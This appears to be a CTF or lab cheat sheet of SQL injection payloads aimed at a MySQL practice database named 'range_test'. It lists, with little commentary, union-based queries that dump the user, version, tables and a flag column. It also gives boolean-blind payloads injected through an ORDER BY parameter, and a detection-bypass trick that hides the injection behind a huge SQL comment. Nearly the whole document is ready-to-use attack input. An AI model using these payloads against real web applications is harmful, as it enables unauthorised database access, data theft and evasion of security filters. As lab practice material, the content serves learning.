username=Tom union select 1 from aa'
username=T'union select 1,2,'3
username=T'union select user(),version(),'3
user()[email protected]
version()=8.0.28
database()=range_test
username=union select , from
username=123'%[email protected]:=(select 'asdasd'
from information_schema.tables limit 1)
union select user(),@a,'3
username=123'%[email protected]:=(select convert(table_name,char(100))
from information_schema.tables limit 1)
union select user(),@a,'3
username=123'%[email protected]:=(select convert(table_name,char(1000))
from information_schema.tables
where table_schema='range_test' limit 0,1)
union select 1,@a,'3
username=123'%[email protected]:=(select convert(column_name,char(1000))
from information_schema.columns
where table_schema='range_test' and table_name='f149_1s_h3r3'
limit 0,1) union select 1,@test,'3
username=123'%[email protected]:=(select convert(f14g_c01umn,char(1000))
from f149_1s_h3r3 limit 0,1) union select 1,@test,'3
order=goods_name,
@a:=(select table_name from information_schema.tables
where table_schema='range_test' limit 2,1),
@b:=(case when substr(@a,12,1)='3' then '1' else 'a' end),
json_type(@b)&limit=10
order=goods_name,
@a:=(select column_name from information_schema.columns
where table_schema='range_test' and table_name='f149_1s_h3r3__________' limit 0,1),
@b:=(case when substr(@a,4,1)='g' then '1' else 'a' end),
json_type(@b)&limit=10
order=goods_name,
@a:=(select f14g_c01umn from f149_1s_h3r3__________ limit 0,1),
@b:=(case when substr(@a,28,1)='/' then '1' else 'a' end),
json_type(@b)&limit=10
username=60万字符' union select 1,table_name,3
from information_schema.tables
where table_schema = 'range_test'limit 0,1 --
利用超大注释绕过检测
username=a'/*60万字符*/union select 1,column_name,3
from information_schema.columns
where table_name = 'flag_t4b1lile'limit 0,1 --